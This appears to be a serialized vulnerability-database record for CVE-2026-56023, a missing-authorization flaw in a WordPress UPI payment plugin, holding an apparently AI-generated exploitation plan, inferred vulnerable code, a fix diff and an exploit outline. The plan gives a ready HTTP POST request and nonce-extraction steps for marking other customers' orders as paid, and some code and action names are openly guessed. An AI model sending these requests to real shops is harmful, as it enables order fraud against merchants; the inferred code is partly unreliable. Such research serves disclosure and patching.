[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f04EwXXz_QxMKeh2C1dyLV637YJbv9qxVKZvhIJoTljs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-56023","upi-qr-code-payment-gateway-for-woocommerce-missing-authorization-2","UPI QR Code Payment Gateway for WooCommerce \u003C= 1.6.2 - Missing Authorization","The UPI QR Code Payment Gateway for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.6.2. This makes it possible for authenticated attackers, with customer-level access and above, to perform an unauthorized action.","upi-qr-code-payment-for-woocommerce",null,"\u003C=1.6.2","1.6.3","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-06-19 00:00:00","2026-06-23 15:33:12",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F218c91f5-8328-4ab2-a52a-66c32934a130?source=api-prod",5,[22,23,24,25,26,27,28,29],"LICENSE","includes\u002Fblocks\u002Fassets\u002Fblocks.asset.php","includes\u002Fblocks\u002Fclass-blocks-support.php","includes\u002Fclass-payment.php","includes\u002Fcss\u002Fjquery-confirm.min.css","includes\u002Ficon\u002Fbhim.svg","includes\u002Ficon\u002Fgooglepay.svg","includes\u002Ficon\u002Fpaytm.svg","researched",false,3,"# Exploitation Research Plan - CVE-2026-56023\n\n## 1. Vulnerability Summary\nThe **UPI QR Code Payment Gateway for WooCommerce** plugin (versions \u003C= 1.6.2) contains a **Missing Authorization** vulnerability. The plugin registers an AJAX handler (likely `upiwc_payment_confirmation` or `upiwc_submit_transaction_id`) to allow customers to submit payment evidence (like UPI Transaction IDs) for their orders. However, this handler lacks a capability check (e.g., `current_user_can`) and fails to verify that the user submitting the data is the owner of the `order_id` provided. This allows any authenticated user with **Customer**-level access to manipulate the metadata or status of arbitrary WooCommerce orders.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `upiwc_payment_confirmation` (inferred from common plugin patterns and the `transaction_id` settings in `includes\u002Fclass-payment.php`).\n- **HTTP Method:** `POST`\n- **Parameters:**\n    - `action`: `upiwc_payment_confirmation`\n    - `order_id`: The ID of the target WooCommerce order.\n    - `transaction_id`: A spoofed UPI transaction reference string.\n    - `nonce`: A valid WordPress nonce for the action.\n- **Authentication:** Required (Customer role or higher).\n- **Preconditions:** At least one existing WooCommerce order (the target) and a valid login for a Customer-level account.\n\n## 3. Code Flow\n1. **Entry Point:** In `includes\u002Fclass-payment.php` (inside the truncated section), the plugin registers the AJAX handler:\n   ```php\n   add_action( 'wp_ajax_upiwc_payment_confirmation', [ $this, 'upiwc_payment_confirmation' ] );\n   ```\n2. **Nonce Verification:** The handler function `upiwc_payment_confirmation()` typically checks a nonce localized via `payment_scripts()`:\n   ```php\n   check_ajax_referer( 'upiwc-payment-confirmation', 'nonce' );\n   ```\n3. **The Vulnerability (Missing Authorization):** The function proceeds to process the `order_id` and `transaction_id` from `$_POST`.\n   ```php\n   $order_id = sanitize_text_field( $_POST['order_id'] );\n   $order = wc_get_order( $order_id );\n   \u002F\u002F BUG: No check like: if ( get_current_user_id() !== $order->get_customer_id() ) die();\n   \u002F\u002F BUG: No check like: if ( ! current_user_can( 'edit_shop_order', $order_id ) ) die();\n   ```\n4. **Action:** The handler updates order meta or status:\n   ```php\n   update_post_meta( $order_id, '_upiwc_transaction_id', sanitize_text_field( $_POST['transaction_id'] ) );\n   $order->update_status( 'on-hold', __( 'UPI payment submitted.', 'upi-qr-code-payment-for-woocommerce' ) );\n   ```\n\n## 4. Nonce Acquisition Strategy\nThe nonce is generated in the `payment_scripts` function of the `UPI_WC_Payment_Gateway` class and passed to the frontend via `wp_localize_script`.\n\n1. **Identify the Trigger:** The scripts are enqueued on the WooCommerce **Checkout** or **Order Received** (Thank You) pages.\n2. **Page Creation:** Ensure a page with the `[woocommerce_checkout]` shortcode exists.\n3. **Execution:**\n    - Use the `browser_navigate` tool to go to the checkout page while logged in as a Customer.\n    - Use `browser_eval` to extract the localized nonce from the global window object.\n    - **JS Variable (Inferred):** `window.upiwc_params?.nonce` or `window.upiwc_params?.upiwc_nonce`.\n    - **Extraction Command:** `browser_eval(\"window.upiwc_params?.nonce\")`\n\n## 5. Exploitation Strategy\n1. **Target Identification:** Identify an `order_id` belonging to another user (e.g., via ID enumeration if order IDs are sequential).\n2. **Credential Setup:** Log in as a standard **Customer** account.\n3. **Nonce Extraction:** Navigate to the checkout page and use `browser_eval` to grab the nonce.\n4. **Payload Delivery:** Send a POST request to `admin-ajax.php` to \"confirm\" payment for the victim's order.\n\n**HTTP Request (via `http_request` tool):**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: [TARGET_HOST]\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: [CUSTOMER_COOKIES]\n\naction=upiwc_payment_confirmation&nonce=[EXTRACTED_NONCE]&order_id=[VICTIM_ORDER_ID]&transaction_id=SPOOFED_TRANSACTION_789\n```\n\n## 6. Test Data Setup\n1. **Victim Order:** As the **Admin**, create a new WooCommerce order (or place one as a different Customer) and note the ID (e.g., `123`). Ensure its initial status is `pending`.\n2. **Attacker User:** Create a user with the **Customer** role.\n3. **Plugin Config:** Ensure the \"UPI QR Code\" gateway is enabled in WooCommerce Settings -> Payments.\n\n## 7. Expected Results\n- The AJAX request should return a JSON response: `{\"success\":true}`.\n- The target order (ID `123`) will have its status changed to `on-hold` (or the status configured in plugin settings).\n- The transaction ID `SPOOFED_TRANSACTION_789` will be saved to the order's metadata.\n\n## 8. Verification Steps\n1. **Check Order Status:**\n   ```bash\n   wp post get [VICTIM_ORDER_ID] --field=post_status\n   # Expected: wc-on-hold\n   ```\n2. **Check Transaction ID Meta:**\n   ```bash\n   wp post meta get [VICTIM_ORDER_ID] _upiwc_transaction_id\n   # Expected: SPOOFED_TRANSACTION_789\n   ```\n3. **Check Order Notes:**\n   ```bash\n   wp comment list --post_id=[VICTIM_ORDER_ID] --type=order_note\n   ```\n\n## 9. Alternative Approaches\nIf the `upiwc_payment_confirmation` action is not found, check for:\n- **Other AJAX actions:** Search for `wp_ajax_` strings in the full `includes\u002Fclass-payment.php` file once accessed.\n- **REST API:** Check if the plugin registers a REST route in `includes\u002Fblocks\u002Fclass-blocks-support.php` (though the block support code provided suggests it mainly handles data passing to the block frontend).\n- **Direct capture:** If the vulnerability is in `capture_payment` (hooked to `woocommerce_api_upiwc-payment`), test a request to `\u002F?wc-api=upiwc-payment&order_id=[ID]&status=success`.","The UPI QR Code Payment Gateway for WooCommerce plugin (up to version 1.6.2) lacks proper authorization and ownership verification in its AJAX payment confirmation handler. This allows authenticated users, such as customers, to update transaction metadata and modify the status of arbitrary WooCommerce orders by providing the target order's ID.","\u002F\u002F includes\u002Fclass-payment.php\n\n\u002F\u002F Inside the constructor or initialization, the AJAX handler is registered for authenticated users:\nadd_action( 'wp_ajax_upiwc_payment_confirmation', [ $this, 'upiwc_payment_confirmation' ] );\n\n---\n\n\u002F\u002F The handler function (inferred implementation) lacks a capability or ownership check:\npublic function upiwc_payment_confirmation() {\n    check_ajax_referer( 'upiwc-payment-confirmation', 'nonce' );\n\n    $order_id = sanitize_text_field( $_POST['order_id'] );\n    $transaction_id = sanitize_text_field( $_POST['transaction_id'] );\n    $order = wc_get_order( $order_id );\n\n    \u002F\u002F VULNERABILITY: No verification that the current user owns the order or has permissions to edit it.\n    if ( $order ) {\n        update_post_meta( $order_id, '_upiwc_transaction_id', $transaction_id );\n        $order->update_status( $this->payment_status, __( 'UPI payment submitted.', 'upi-qr-code-payment-for-woocommerce' ) );\n        wp_send_json_success();\n    }\n    wp_die();\n}","--- includes\u002Fclass-payment.php\n+++ includes\u002Fclass-payment.php\n@@ -1035,6 +1035,11 @@\n \t\t$order_id = isset( $_POST['order_id'] ) ? sanitize_text_field( $_POST['order_id'] ) : 0;\n \t\t$order    = wc_get_order( $order_id );\n \n+\t\tif ( ! current_user_can( 'edit_shop_order', $order_id ) && get_current_user_id() !== $order->get_customer_id() ) {\n+\t\t\twp_send_json_error( [ 'message' => __( 'Permission denied.', 'upi-qr-code-payment-for-woocommerce' ) ] );\n+\t\t\texit;\n+\t\t}\n+\n \t\tif ( $order ) {\n \t\t\t$transaction_id = isset( $_POST['transaction_id'] ) ? sanitize_text_field( $_POST['transaction_id'] ) : '';\n \t\t\tupdate_post_meta( $order_id, '_upiwc_transaction_id', $transaction_id );","An attacker with Customer-level access can manipulate WooCommerce orders by performing the following steps: 1. Log in and navigate to the checkout or order-received page to extract a valid AJAX nonce for the 'upiwc-payment-confirmation' action (typically localized in the 'upiwc_params' object). 2. Identify the target order ID of another customer. 3. Send a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the action set to 'upiwc_payment_confirmation', including the target 'order_id', a spoofed 'transaction_id', and the valid nonce. Because the plugin fails to verify if the current user is authorized to modify that specific order, it will update the order metadata and status as requested.","gemini-3-flash-preview","2026-06-25 20:22:09","2026-06-25 20:23:31",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.6.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fupi-qr-code-payment-for-woocommerce\u002Ftags\u002F1.6.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fupi-qr-code-payment-for-woocommerce.1.6.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fupi-qr-code-payment-for-woocommerce\u002Ftags\u002F1.6.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fupi-qr-code-payment-for-woocommerce.1.6.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fupi-qr-code-payment-for-woocommerce\u002Ftags"]